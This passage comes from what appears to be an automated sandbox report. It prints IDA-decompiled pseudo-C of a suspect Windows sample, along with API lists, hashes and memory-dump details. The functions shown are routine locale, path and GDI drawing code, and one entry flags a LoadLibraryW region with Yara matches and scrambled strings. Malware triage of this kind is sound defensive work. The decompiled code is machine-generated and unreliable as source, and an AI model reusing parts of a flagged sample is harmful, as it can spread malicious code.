                  					} else {
                  						_t41 = _t43;
                  					}
                  				}
                  				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
                  				E00448FA3(_t44 - 0x14);
                  				return E00431B73(_t41);
                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 004489F7
                  • std::_Lockit::_Lockit.LIBCPMT ref: 00448A01
                  • int.LIBCPMT ref: 00448A18
                    • Part of subcall function 00447732: std::_Lockit::_Lockit.LIBCPMT ref: 00447745
                  • std::locale::_Getfacet.LIBCPMT ref: 00448A21
                  • ctype.LIBCPMT ref: 00448A3B
                  • std::bad_exception::bad_exception.LIBCMT ref: 00448A4F
                  • __CxxThrowException@8.LIBCMT ref: 00448A5D
                  • std::locale::facet::_Incref.LIBCPMT ref: 00448A6D
                  • std::locale::facet::facet_Register.LIBCPMT ref: 00448A73
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowctypestd::bad_exception::bad_exceptionstd::locale::_std::locale::facet::_std::locale::facet::facet_
                  • String ID: TuF$bad cast
                  • API String ID: 2535038987-1496521168
                  • Opcode ID: d1a9c288e7aec9ff4f5bf7d24857f49445e3ddbaba58f23c9a0fa4d8bebe908b
                  • Instruction ID: ff64b05e2f82beb86cc65c12f0f5b39e1603df0fa0b9ef5944976ff18bc40764
                  • Opcode Fuzzy Hash: d1a9c288e7aec9ff4f5bf7d24857f49445e3ddbaba58f23c9a0fa4d8bebe908b
                  • Instruction Fuzzy Hash: 5501A13190421597EF05FBA188829BE72356F44328F54021FF1107B2E1DF7C9A06DB9D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 81%
                  			E0042BE83(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				void* _t156;
                  				intOrPtr* _t158;
                  				intOrPtr _t165;
                  				intOrPtr* _t176;
                  				short _t178;
                  				short _t180;
                  				short _t182;
                  				short _t184;
                  				short _t186;
                  				short _t188;
                  				short _t192;
                  				char* _t193;
                  				short _t194;
                  				char* _t195;
                  				short _t196;
                  				char* _t198;
                  				char _t199;
                  				char* _t201;
                  				char _t202;
                  				short _t209;
                  				char* _t210;
                  				short* _t216;
                  				char* _t217;
                  				int _t220;
                  				int _t225;
                  				short _t226;
                  				void* _t227;
                  				char _t277;
                  				char _t278;
                  				signed int _t287;
                  				signed int _t292;
                  				intOrPtr* _t312;
                  				intOrPtr* _t313;
                  				void* _t316;
                  				void* _t317;
                  				void* _t324;
                  
                  				_push(0x28);
                  				_t156 = E00431A9B(E0044C838, __ebx, __edi, __esi);
                  				_t316 = __ecx;
                  				_t311 = 1;
                  				if( *((intOrPtr*)(__ecx + 0x78)) != 1) {
                  					L29:
                  					return E00431B73(_t156);
                  				}
                  				_t158 =  *((intOrPtr*)(__ecx + 0x80));
                  				_t301 = _t317 - 0x28;
                  				_push(_t317 - 0x28);
                  				_push(_t158);
                  				if( *((intOrPtr*)( *_t158 + 0x50))() < 0) {
                  					__eflags =  *( *((intOrPtr*)(__ecx + 0x74)) + 0x34) & 0x00000200;
                  					if(__eflags == 0) {
                  						L28:
                  						_push(_t317 - 0x24);
                  						_t312 = E0042BA2F(0, _t316, _t301, _t311, _t316, _t324);
                  						_push(_t317 - 0x2c);
                  						 *(_t317 - 4) = 2;
                  						_t165 =  *((intOrPtr*)(E0042BBEC(0, _t316, _t301, _t312, _t316, _t324)));
                  						_t302 =  *((intOrPtr*)(_t165 - 0xc));
                  						( *(_t316 + 0x74))[0x38] =  *((intOrPtr*)( *_t312 - 0xc)) -  *((intOrPtr*)(_t165 - 0xc));
                  						E004010B0( *((intOrPtr*)(_t317 - 0x2c)) + 0xfffffff0,  *((intOrPtr*)(_t165 - 0xc)));
                  						 *(_t317 - 4) =  *(_t317 - 4) | 0xffffffff;
                  						E004010B0( *(_t317 - 0x24) + 0xfffffff0,  *((intOrPtr*)(_t165 - 0xc)));
                  						_push(_t317 - 0x34);
                  						_t313 = E0042BA2F(0, _t316,  *((intOrPtr*)(_t165 - 0xc)), _t312, _t316, _t324);
                  						_push(_t317 - 0x30);
                  						 *(_t317 - 4) = 3;
                  						( *(_t316 + 0x74))[0x3a] =  *((intOrPtr*)( *_t313 - 0xc)) -  *((intOrPtr*)( *((intOrPtr*)(E0042BCDF(0, _t316,  *((intOrPtr*)(_t165 - 0xc)), _t313, _t316, _t324))) - 0xc));
                  						E004010B0( *((intOrPtr*)(_t317 - 0x30)) + 0xfffffff0, _t302);
                  						_t156 = E004010B0( *((intOrPtr*)(_t317 - 0x34)) + 0xfffffff0, _t302);
                  						goto L29;
                  					}
                  					_t176 =  *((intOrPtr*)(__ecx + 0x80));
                  					_t301 = _t317 - 0x24;
                  					 *(_t317 - 0x24) = 0;
                  					__eflags =  *((intOrPtr*)( *_t176))(_t176, 0x454754, _t317 - 0x24);
                  					if(__eflags < 0) {
                  						goto L28;
                  					}
                  					_t178 =  *(_t317 - 0x24);
                  					_t301 = _t317 - 0x20;
                  					 *(_t317 - 0x20) = 0;
                  					__eflags =  *((intOrPtr*)( *_t178 + 0x6c))(_t178, _t317 - 0x20);
                  					if(__eflags < 0) {
                  						L26:
                  						_t180 =  *(_t317 - 0x24);
                  						L27:
                  						 *((intOrPtr*)( *_t180 + 8))(_t180);
                  						goto L28;
                  					}
                  					_t182 =  *(_t317 - 0x20);
                  					_t301 = _t317 - 0x1c;
                  					__eflags =  *((intOrPtr*)( *_t182 + 0x24))(_t182, _t317 - 0x1c);
                  					if(__eflags < 0) {
                  						L25:
                  						_t184 =  *(_t317 - 0x20);
                  						 *((intOrPtr*)( *_t184 + 8))(_t184);
                  						goto L26;
                  					}
                  					_t186 =  *(_t317 - 0x1c);
                  					_t301 = _t317 - 0x18;
                  					 *((intOrPtr*)(_t317 - 0x2c)) = 0;
                  					__eflags =  *((intOrPtr*)( *_t186 + 0xc))(_t186, 1, _t317 - 0x18, _t317 - 0x2c);
                  					if(__eflags != 0) {
                  						L24:
                  						_t188 =  *(_t317 - 0x1c);
                  						 *((intOrPtr*)( *_t188 + 8))(_t188);
                  						goto L25;
                  					}
                  					E00405C38(_t317 - 0x14);
                  					 *(_t317 - 4) = 1;
                  					_t311 = ( *(_t316 + 0x74))[0x1c];
                  					_t192 =  *(_t317 - 0x18);
                  					 *(_t317 - 0x10) = 0;
                  					_t193 =  *((intOrPtr*)( *_t192 + 0x14))(_t192, 0x80058000, _t317 - 0x10);
                  					__eflags = _t193;
                  					if(_t193 >= 0) {
                  						PathRemoveFileSpecW( *(_t317 - 0x10));
                  						_t225 = WideCharToMultiByte(0, 0,  *(_t317 - 0x10), 0xffffffff, _t311, ( *(_t316 + 0x74))[0x20] - 1, 0, 0);
                  						_t311 =  &(_t311[_t225]);
                  						__eflags = _t311;
                  						__imp__CoTaskMemFree( *(_t317 - 0x10));
                  					}
                  					while(1) {
                  						_t194 =  *(_t317 - 0x18);
                  						_t301 = _t317 - 0x10;
                  						 *(_t317 - 0x10) = 0;
                  						_t195 =  *((intOrPtr*)( *_t194 + 0x14))(_t194, 0x80058000, _t317 - 0x10);
                  						__eflags = _t195;
                  						if(_t195 >= 0) {
                  							E0042B03E(0, _t317 - 0x14, _t301,  *(_t317 - 0x10));
                  							PathRemoveFileSpecW(E0042B001(_t317 - 0x14));
                  							E0041FF66(_t317 - 0x14, 0xffffffff);
                  							_t287 =  *( *((intOrPtr*)(_t317 - 0x14)) - 0xc);
                  							_t216 =  *(_t317 - 0x10);
                  							__eflags = _t216[_t287] - 0x5c;
                  							if(_t216[_t287] == 0x5c) {
                  								_t287 = _t287 + 1;
                  								__eflags = _t287;
                  							}
                  							_t217 =  *(_t316 + 0x74);
                  							_t301 = _t217[0x20] + _t217[0x1c] - _t311 - 1;
                  							_t220 = WideCharToMultiByte(0, 0,  &(( *(_t317 - 0x10))[_t287]), 0xffffffff, _t311, _t217[0x20] + _t217[0x1c] - _t311 - 1, 0, 0);
                  							_t311 =  &(_t311[_t220]);
                  							__eflags = _t311;
                  							__imp__CoTaskMemFree( *(_t317 - 0x10));
                  						}
                  						_t196 =  *(_t317 - 0x18);
                  						 *((intOrPtr*)( *_t196 + 8))(_t196);
                  						_t198 =  *(_t316 + 0x74);
                  						_t277 = _t198[0x20];
                  						_t199 = _t198[0x1c];
                  						__eflags = _t311 - _t277 + _t199 - 1;
                  						if(_t311 >= _t277 + _t199 - 1) {
                  							break;
                  						}
                  						_t209 =  *(_t317 - 0x1c);
                  						_t301 = _t317 - 0x18;
                  						_t210 =  *((intOrPtr*)( *_t209 + 0xc))(_t209, 1, _t317 - 0x18, _t317 - 0x2c);
                  						__eflags = _t210;
                  						if(_t210 == 0) {
                  							continue;
                  						}
                  						break;
                  					}
                  					_t201 =  *(_t316 + 0x74);
                  					_t278 = _t201[0x20];
                  					_t202 = _t201[0x1c];
                  					__eflags = _t311 - _t278 + _t202 - 1;
                  					if(_t311 >= _t278 + _t202 - 1) {
                  						 *((char*)(( *(_t316 + 0x74))[0x20] + ( *(_t316 + 0x74))[0x1c] - 2)) = 0;
                  						 *((char*)(( *(_t316 + 0x74))[0x20] + ( *(_t316 + 0x74))[0x1c] - 1)) = 0;
                  					} else {
                  						 *_t311 = 0;
                  					}
                  					 *(_t317 - 4) =  *(_t317 - 4) | 0xffffffff;
                  					__eflags =  *((intOrPtr*)(_t317 - 0x14)) + 0xfffffff0;
                  					E004010B0( *((intOrPtr*)(_t317 - 0x14)) + 0xfffffff0, _t301);
                  					goto L24;
                  				}
                  				_t226 =  *(_t317 - 0x28);
                  				_t301 = _t317 - 0x10;
                  				 *(_t317 - 0x10) = 0;
                  				_t227 =  *((intOrPtr*)( *_t226 + 0x14))(_t226, 0x80058000, _t317 - 0x10);
                  				_t321 = _t227;
                  				if(_t227 >= 0) {
                  					_push( *(_t317 - 0x10));
                  					E0042BE3F(0, _t317 - 0x14, 1, __ecx, _t321);
                  					 *(_t317 - 4) = 0;
                  					PathRemoveFileSpecW(E0042B001(_t317 - 0x14));
                  					E0041FF66(_t317 - 0x14, 0xffffffff);
                  					_t292 =  *( *((intOrPtr*)(_t317 - 0x14)) - 0xc);
                  					_t301 =  *(_t317 - 0x10);
                  					if(_t301[_t292] == 0x5c) {
                  						_t292 = _t292 + 1;
                  					}
                  					WideCharToMultiByte(0, 0,  &(_t301[_t292]), 0xffffffff, ( *(_t316 + 0x74))[0x24], ( *(_t316 + 0x74))[0x28], 0, 0);
                  					 *((char*)(( *(_t316 + 0x74))[0x28] + ( *(_t316 + 0x74))[0x24] - 1)) = 0;
                  					WideCharToMultiByte(0, 0,  *(_t317 - 0x10), 0xffffffff, ( *(_t316 + 0x74))[0x1c], ( *(_t316 + 0x74))[0x20] - 1, 0, 0);
                  					 *((char*)(( *(_t316 + 0x74))[0x20] + ( *(_t316 + 0x74))[0x1c] - 2)) = 0;
                  					_t311 =  *(_t316 + 0x74);
                  					 *((char*)(E00431A10(_t311[0x1c]) + _t311[0x1c] + 1)) = 0;
                  					__imp__CoTaskMemFree( *(_t317 - 0x10));
                  					 *(_t317 - 4) =  *(_t317 - 4) | 0xffffffff;
                  					_t324 =  *((intOrPtr*)(_t317 - 0x14)) + 0xfffffff0;
                  					E004010B0( *((intOrPtr*)(_t317 - 0x14)) + 0xfffffff0, _t301);
                  				}
                  				_t180 =  *(_t317 - 0x28);
                  				goto L27;
                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0042BE8A
                  • PathRemoveFileSpecW.SHLWAPI(00000000,?), ref: 0042BEEB
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 0042BF25
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 0042BF48
                  • _strlen.LIBCMT ref: 0042BF5D
                  • CoTaskMemFree.OLE32(?), ref: 0042BF6D
                  • PathRemoveFileSpecW.SHLWAPI(?), ref: 0042C030
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 0042C048
                  • CoTaskMemFree.OLE32(?), ref: 0042C053
                  • PathRemoveFileSpecW.SHLWAPI(00000000), ref: 0042C086
                    • Part of subcall function 0042BE3F: __EH_prolog3.LIBCMT ref: 0042BE46
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 0042C0C2
                  • CoTaskMemFree.OLE32(?), ref: 0042C0CD
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$FileFreePathRemoveSpecTask$H_prolog3$_strlen
                  • String ID:
                  • API String ID: 40125332-0
                  • Opcode ID: 0de55032d2de1d9b05756dd0f3eb9acb81df7eac66d34590316005367f3a3aa4
                  • Instruction ID: 89a8467473b8a028d0dcd0eb024d72da42818e89e32c94e27286938f1a2e76e1
                  • Opcode Fuzzy Hash: 0de55032d2de1d9b05756dd0f3eb9acb81df7eac66d34590316005367f3a3aa4
                  • Instruction Fuzzy Hash: 65C15970A00619DFCB04DFA8C994DAEB7B9FF88314B50465DF522AB3A1CB35AD01CB64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 02318CD0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: ($}81$(&S$10Jj$7x$GE$WBt$[I7g$x|
                  • API String ID: 1029625771-105190942
                  • Opcode ID: fbabede92cdd5195f8ee65217b1c1f4fd201e03de6a21e041b6b9c77bde49291
                  • Instruction ID: 75f66f325e7de714b1438c3866d76d606abe7545fdf055dc633def60090430cd
                  • Opcode Fuzzy Hash: fbabede92cdd5195f8ee65217b1c1f4fd201e03de6a21e041b6b9c77bde49291
                  • Instruction Fuzzy Hash: 5B32B5B4816369CBEB61DF829A897CDBB74BB11304F6086C8D2593B214CB750B86CF85
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 98%
                  			E0042408E(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				void* _t131;
                  				intOrPtr _t195;
                  				intOrPtr* _t223;
                  				void* _t226;
                  				intOrPtr _t229;
                  
                  				_push(0x38);
                  				E00431A9B(E0044C068, __ebx, __edi, __esi);
                  				_t223 = __ecx;
                  				 *((intOrPtr*)(_t226 - 0x30)) = 0;
                  				 *((intOrPtr*)(_t226 - 0x34)) = 0x452b4c;
                  				 *(_t226 - 4) = 0;
                  				 *((intOrPtr*)(_t226 - 0x28)) = 0;
                  				 *((intOrPtr*)(_t226 - 0x2c)) = 0x452b4c;
                  				 *((intOrPtr*)(_t226 - 0x20)) = 0;
                  				 *((intOrPtr*)(_t226 - 0x24)) = 0x452b4c;
                  				 *(_t226 - 4) = 2;
                  				E00423A90(_t226 - 0x2c,  *(_t226 + 8));
                  				E00413342(_t226 - 0x44,  *(_t226 + 8));
                  				InflateRect(_t226 - 0x44,  ~( *(_t226 + 0xc)),  ~( *(_t226 + 0x10)));
                  				IntersectRect(_t226 - 0x44, _t226 - 0x44,  *(_t226 + 8));
                  				E00423A90(_t226 - 0x24, _t226 - 0x44);
                  				E00423059(0, _t226 - 0x34, _t223, CreateRectRgn(0, 0, 0, 0));
                  				E00423F00(_t226 - 0x34, _t226 - 0x2c, _t226 - 0x24, 3);
                  				_t228 =  *((intOrPtr*)(_t226 + 0x20));
                  				if( *((intOrPtr*)(_t226 + 0x20)) == 0) {
                  					 *((intOrPtr*)(_t226 + 0x20)) = E00423F2F(0, _t223, 0x452b4c, _t228);
                  				}
                  				_t195 =  *((intOrPtr*)(_t226 + 0x20));
                  				_t229 = _t195;
                  				_t230 = _t229 == 0;
                  				if(_t229 == 0) {
                  					E00406436(0, _t195, _t223, 0x452b4c, _t230);
                  				}
                  				if( *((intOrPtr*)(_t226 + 0x24)) == 0) {
                  					 *((intOrPtr*)(_t226 + 0x24)) = _t195;
                  				}
                  				 *((intOrPtr*)(_t226 - 0x18)) = 0;
                  				 *((intOrPtr*)(_t226 - 0x1c)) = 0x452b4c;
                  				 *((intOrPtr*)(_t226 - 0x10)) = 0;
                  				 *((intOrPtr*)(_t226 - 0x14)) = 0x452b4c;
                  				 *(_t226 - 4) = 4;
                  				if( *(_t226 + 0x14) != 0) {
                  					E00423059(0, _t226 - 0x1c, _t223, CreateRectRgn(0, 0, 0, 0));
                  					E00423EE0(_t226 - 0x2c,  *(_t226 + 0x14));
                  					CopyRect(_t226 - 0x44,  *(_t226 + 0x14));
                  					InflateRect(_t226 - 0x44,  ~( *(_t226 + 0x18)),  ~( *(_t226 + 0x1c)));
                  					IntersectRect(_t226 - 0x44, _t226 - 0x44,  *(_t226 + 0x14));
                  					E00423EE0(_t226 - 0x24, _t226 - 0x44);
                  					E00423F00(_t226 - 0x1c, _t226 - 0x2c, _t226 - 0x24, 3);
                  					if( *((intOrPtr*)( *((intOrPtr*)(_t226 + 0x20)) + 4)) ==  *((intOrPtr*)( *((intOrPtr*)(_t226 + 0x24)) + 4))) {
                  						E00423059(0, _t226 - 0x14, _t223, CreateRectRgn(0, 0, 0, 0));
                  						E00423F00(_t226 - 0x14, _t226 - 0x1c, _t226 - 0x34, 3);
                  					}
                  				}
                  				if( *((intOrPtr*)( *((intOrPtr*)(_t226 + 0x20)) + 4)) !=  *((intOrPtr*)( *((intOrPtr*)(_t226 + 0x24)) + 4)) &&  *(_t226 + 0x14) != 0) {
                  					E00422B77(_t223, _t226 - 0x1c);
                  					 *((intOrPtr*)( *_t223 + 0x50))(_t226 - 0x44);
                  					 *(_t226 + 0x14) = E00423194(_t223,  *((intOrPtr*)(_t226 + 0x24)));
                  					E0041B463(_t223,  *(_t226 - 0x44),  *((intOrPtr*)(_t226 - 0x40)),  *((intOrPtr*)(_t226 - 0x3c)) -  *(_t226 - 0x44),  *((intOrPtr*)(_t226 - 0x38)) -  *((intOrPtr*)(_t226 - 0x40)), 0x5a0049);
                  					E00423194(_t223,  *(_t226 + 0x14));
                  				}
                  				_t131 = _t226 - 0x14;
                  				if( *((intOrPtr*)(_t226 - 0x10)) == 0) {
                  					_t131 = _t226 - 0x34;
                  				}
                  				E00422B77(_t223, _t131);
                  				 *((intOrPtr*)( *_t223 + 0x50))(_t226 - 0x44);
                  				 *(_t226 + 0x14) = E00423194(_t223,  *((intOrPtr*)(_t226 + 0x20)));
                  				E0041B463(_t223,  *(_t226 - 0x44),  *((intOrPtr*)(_t226 - 0x40)),  *((intOrPtr*)(_t226 - 0x3c)) -  *(_t226 - 0x44),  *((intOrPtr*)(_t226 - 0x38)) -  *((intOrPtr*)(_t226 - 0x40)), 0x5a0049);
                  				_t238 =  *(_t226 + 0x14);
                  				if( *(_t226 + 0x14) != 0) {
                  					E00423194(_t223,  *(_t226 + 0x14));
                  				}
                  				E00422B77(_t223, 0);
                  				 *(_t226 - 4) = 3;
                  				 *((intOrPtr*)(_t226 - 0x14)) = 0x452b4c;
                  				E0040ADD4(0, _t226 - 0x14, _t223, 0x452b4c, _t238);
                  				 *(_t226 - 4) = 2;
                  				 *((intOrPtr*)(_t226 - 0x1c)) = 0x452b4c;
                  				E0040ADD4(0, _t226 - 0x1c, _t223, 0x452b4c, _t238);
                  				 *(_t226 - 4) = 1;
                  				 *((intOrPtr*)(_t226 - 0x24)) = 0x452b4c;
                  				E0040ADD4(0, _t226 - 0x24, _t223, 0x452b4c, _t238);
                  				 *(_t226 - 4) = 0;
                  				 *((intOrPtr*)(_t226 - 0x2c)) = 0x452b4c;
                  				E0040ADD4(0, _t226 - 0x2c, _t223, 0x452b4c, _t238);
                  				 *(_t226 - 4) =  *(_t226 - 4) | 0xffffffff;
                  				 *((intOrPtr*)(_t226 - 0x34)) = 0x452b4c;
                  				return E00431B73(E0040ADD4(0, _t226 - 0x34, _t223, 0x452b4c,  *(_t226 - 4)));
                  			}

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00424095
                    • Part of subcall function 00423A90: CreateRectRgnIndirect.GDI32(?), ref: 00423A9B
                    • Part of subcall function 00413342: CopyRect.USER32 ref: 0041334E
                  • InflateRect.USER32(?,?,?), ref: 004240E2
                  • IntersectRect.USER32 ref: 004240F0
                  • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00424106
                    • Part of subcall function 00423F00: CombineRgn.GDI32(?,?,?,?), ref: 00423F25
                  • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 0042416C
                  • CopyRect.USER32 ref: 0042418D
                  • InflateRect.USER32(?,?,?), ref: 004241A3
                  • IntersectRect.USER32 ref: 004241B1
                  • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 004241E7
                    • Part of subcall function 00423F2F: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 00423F77
                    • Part of subcall function 00423F2F: CreatePatternBrush.GDI32(00000000), ref: 00423F84
                    • Part of subcall function 00423F2F: DeleteObject.GDI32(00000000), ref: 00423F90
                    • Part of subcall function 0041B463: PatBlt.GDI32(?,?,?,?,?,?), ref: 0041B47A
                    • Part of subcall function 00423194: SelectObject.GDI32(?,00000000), ref: 004231BA
                    • Part of subcall function 00423194: SelectObject.GDI32(?,?), ref: 004231D0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Rect$Create$Object$CopyInflateIntersectSelect$BitmapBrushCombineDeleteH_prolog3IndirectPattern
                  • String ID: L+E
                  • API String ID: 714730959-4127712704
                  • Opcode ID: 6aa0efc2d5fbc0ece01efad2b7094022daf9b6fd7deab85dd961b32c0ce17b0a
                  • Instruction ID: c7474286af9328ab8c9880faf502c19b26b7c4664d15d937edb6bbe153de222e
                  • Opcode Fuzzy Hash: 6aa0efc2d5fbc0ece01efad2b7094022daf9b6fd7deab85dd961b32c0ce17b0a
                  • Instruction Fuzzy Hash: 1191F871A0011AEFCF01DFA5D9859EEBBB9FF08309F50416AF505A2251DB38AE05CB69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 94%
                  			E0041F611(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t50;
                  				int _t62;
                  				intOrPtr _t65;
                  				int _t68;
                  				void* _t73;
                  				struct tagMENUITEMINFOA _t84;
                  				void* _t103;
                  				intOrPtr _t105;
                  				intOrPtr _t110;
                  				void* _t112;
                  
                  				_t103 = __edx;
                  				_push(0x54);
                  				E00431A9B(E0044BDC2, __ebx, __edi, __esi);
                  				 *((intOrPtr*)(_t112 - 0x10)) = __ecx;
                  				_t105 =  *((intOrPtr*)(_t112 + 8));
                  				_t50 =  *((intOrPtr*)(_t105 + 0x14));
                  				if(_t50 == 0) {
                  					 *(_t112 - 0x18) = GetSystemMetrics(0x32) + 2;
                  					_t110 = GetSystemMetrics(0x31) + 2;
                  					__eflags = _t110;
                  				} else {
                  					GetObjectA( *(_t50 + 4), 0x18, _t112 - 0x30);
                  					 *(_t112 - 0x18) =  *((intOrPtr*)(_t112 - 0x28)) + 2;
                  					_t110 =  *((intOrPtr*)(_t112 - 0x2c)) + 2;
                  				}
                  				E004014C0(_t112 + 8, _t103);
                  				 *(_t112 - 4) =  *(_t112 - 4) & 0x00000000;
                  				_t84 = 0x30;
                  				E00431160(_t105, _t112 - 0x60, 0, _t84);
                  				 *(_t112 - 0x60) = _t84;
                  				 *((intOrPtr*)(_t112 - 0x5c)) = 0x40;
                  				if(GetMenuItemInfoA( *( *((intOrPtr*)(_t112 - 0x10)) + 4),  *(_t105 + 8), 0, _t112 - 0x60) != 0) {
                  					_t65 = E004014F0(_t112 + 8,  *((intOrPtr*)(_t112 - 0x38)));
                  					 *((intOrPtr*)(_t112 - 0x38)) =  *((intOrPtr*)(_t112 - 0x38)) + 1;
                  					 *((intOrPtr*)(_t112 - 0x3c)) = _t65;
                  					_t68 = GetMenuItemInfoA( *( *((intOrPtr*)(_t112 - 0x10)) + 4),  *(_t105 + 8), 0, _t112 - 0x60);
                  					_t87 = _t68;
                  					E0040A356(_t112 + 8, 0xffffffff);
                  					_t118 = _t68;
                  					if(_t68 != 0) {
                  						_push(0);
                  						E00422EAE(_t87, _t112 - 0x2c, _t105, _t110, _t118);
                  						 *(_t112 - 4) = 1;
                  						_t73 = E00423194(_t112 - 0x2c,  *((intOrPtr*)(_t112 - 0x10)) + 8);
                  						E0040BD78(_t112 - 0x2c, _t112 - 0x14, _t112 + 8);
                  						E00423194(_t112 - 0x2c, _t73);
                  						_t110 = _t110 +  *((intOrPtr*)(_t112 - 0x14)) + 3;
                  						 *(_t112 - 4) = 0;
                  						E00422F02(_t73, _t112 - 0x2c, _t105, _t110,  *((intOrPtr*)(_t112 - 0x10)) + 8);
                  					}
                  				}
                  				if(GetSystemMetrics(0xf) <=  *(_t112 - 0x18)) {
                  					_t62 =  *(_t112 - 0x18);
                  				} else {
                  					_t62 = GetSystemMetrics(0xf);
                  				}
                  				 *(_t105 + 0x10) = _t62;
                  				 *((intOrPtr*)(_t105 + 0xc)) = _t110;
                  				return E00431B73(E004010B0( *((intOrPtr*)(_t112 + 8)) + 0xfffffff0, _t103));
                  			}

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MetricsSystem$InfoItemMenu$H_prolog3Object_memset
                  • String ID: @
                  • API String ID: 3341327673-2766056989
                  • Opcode ID: 41161956b9a01d5f9c9dd8a14ab3da4081575cdaa8d29da6693ed210bcd308bc
                  • Instruction ID: e77ca942a99a59ecf314c7d34bbccfe8690614ce3f94bd7383c0d0d0d390d164
                  • Opcode Fuzzy Hash: 41161956b9a01d5f9c9dd8a14ab3da4081575cdaa8d29da6693ed210bcd308bc
                  • Instruction Fuzzy Hash: 97415371900219AFDB00DFA5CC82FEDB7B4FF18314F04412AFA15A7291DB74AA45CBA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 95%
                  			E0041A027(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                  				int _t35;
                  				int _t36;
                  				intOrPtr* _t56;
                  				intOrPtr _t57;
                  				intOrPtr* _t74;
                  				void* _t75;
                  
                  				_push(0xc);
                  				E00431A9B(E0044B74A, __ebx, __edi, __esi);
                  				_t74 = __ecx;
                  				_t61 =  *((intOrPtr*)(_t75 + 8));
                  				_t77 =  *((intOrPtr*)(_t75 + 8));
                  				if( *((intOrPtr*)(_t75 + 8)) == 0) {
                  					E00406436(__ebx, _t61, __edi, __ecx, _t77);
                  				}
                  				_t56 = _t74 + 0x64;
                  				E00419355(_t61, _t56);
                  				 *((intOrPtr*)(_t74 + 0x58)) =  *((intOrPtr*)(_t74 + 0x68)) - GetSystemMetrics(0x25);
                  				 *((intOrPtr*)(_t74 + 0x60)) = GetSystemMetrics(0x25) +  *((intOrPtr*)(_t74 + 0x68));
                  				_t35 = GetSystemMetrics(0x24);
                  				_t57 =  *_t56;
                  				 *((intOrPtr*)(_t74 + 0x54)) =  *_t56 - _t35;
                  				_t36 = GetSystemMetrics(0x24);
                  				 *((intOrPtr*)(_t74 + 0x5c)) = _t36 + _t57;
                  				 *((intOrPtr*)(_t75 - 0x10)) =  *_t74;
